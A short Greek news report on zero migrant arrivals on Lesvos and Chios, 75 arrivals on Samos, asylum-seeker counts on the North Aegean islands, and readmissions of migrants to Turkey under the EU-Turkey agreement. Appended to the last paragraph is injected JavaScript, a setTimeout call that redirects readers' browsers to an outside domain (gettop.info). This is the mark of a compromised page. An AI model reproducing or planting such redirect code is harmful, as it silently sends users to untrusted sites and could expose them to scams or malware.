Μηδενικές ροές στα νησιά για τέταρτο 24ωρο – Επαναπρόωθηση 60 μεταναστών στην Τουρκία

0
3

 

Τέταρτο συνεχές 24ωρο, από χθες Πέμπτη έως σήμερα Παρασκευή το πρωί, χωρίς πρόσφυγες και μετανάστες για τους νομούς Λέσβου και Χίου. Αντίθετα το σερί των μηδενικών ροών «έσπασε» στη Σάμο με αφίξεις 75 συνολικά ατόμων το τελευταίο 24ωρο.

Σύμφωνα με τα σημερινά στοιχεία της Αστυνομικής Περιφέρειας βορείου Αιγαίου ο αριθμός των αιτούντων άσυλο, που είναι σήμερα εγκλωβισμένοι, στη Λέσβο ανέρχονται σε 5.250, στη Χίο 4.167 και στη Σάμο 1.982.

Συνολικά ο αριθμός των εγκλωβισμένων προσφύγων και μεταναστών στα νησιά του βορείου Αιγαίου ανέρχεται στους 11.399.

Στο μεταξύ, 60 μετανάστες κυρίως από χώρες της βόρειας Αφρικής επαναπροωθούνται σήμερα το πρωί σε εφαρμογή της συμφωνίας Ευρωπαϊκής ¨Ένωσης – Τουρκίας από το λιμάνι της Μυτιλήνης στο Δικελί της Τουρκίας.

Αν και χθες έφτανε τους 160 ο αριθμός των ανθρώπων που επρόκειτο να επαναπροωθηθούν, οι περισσότεροι από αυτούς υπέβαλαν αίτημα ασύλου και σταμάτησε για αυτούς κάθε διαδικασία.

Επίσης χθες επαναπροωθήθηκαν αεροπορικώς από τη Μυτιλήνη στα Άδανα της Τουρκίας 17 Σύροι που παραιτήθηκαν του δικαιώματος ασύλου, στο πλαίσιο εφαρμογής της Συμφωνίας Ευρωπαϊκής Ένωσης – Τουρκίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here